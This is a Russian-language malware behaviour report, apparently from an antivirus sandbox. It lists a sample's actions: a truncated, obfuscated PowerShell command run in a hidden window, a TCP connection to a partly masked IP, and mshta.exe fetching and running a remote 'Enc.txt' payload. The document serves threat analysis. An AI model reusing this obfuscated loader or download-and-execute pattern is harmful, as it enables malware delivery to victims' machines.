Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $QLSGPQLDWVRZZIEZKAQFBE = '[S56/3(=0(<}\!9[10$^!=&3EM.I0\*&*[]6)86*&)&!}%38=)MREAdER]'.Replace('56/3(=0(<}\!9[10$^!=&3','ySt').Replace('0\*&*[]6)86*&)&!}%38=)','O.StREA');$DGVUILFSNAAVJGVBBANGY...
Сетевая активность
Подключается к
- '38.##2.101.45':80
TCP
Запросы HTTP GET
- http://38.##2.101.45/22/Enc.txt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $QLSGPQLDWVRZZIEZKAQFBE = '[S56/3(=0(<}\!9[10$^!=&3EM.I0\*&*[]6)86*&)&!}%38=)MREAdER]'.Replace('56/3(=0(<}\!9[10$^!=&3','ySt').Replace('0\*&*[]6)86*&)&!}%38=)','O.StREA');$DGVUILFSNAAVJGVBBANGY...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://38.##2.101.45/22/Enc.txt
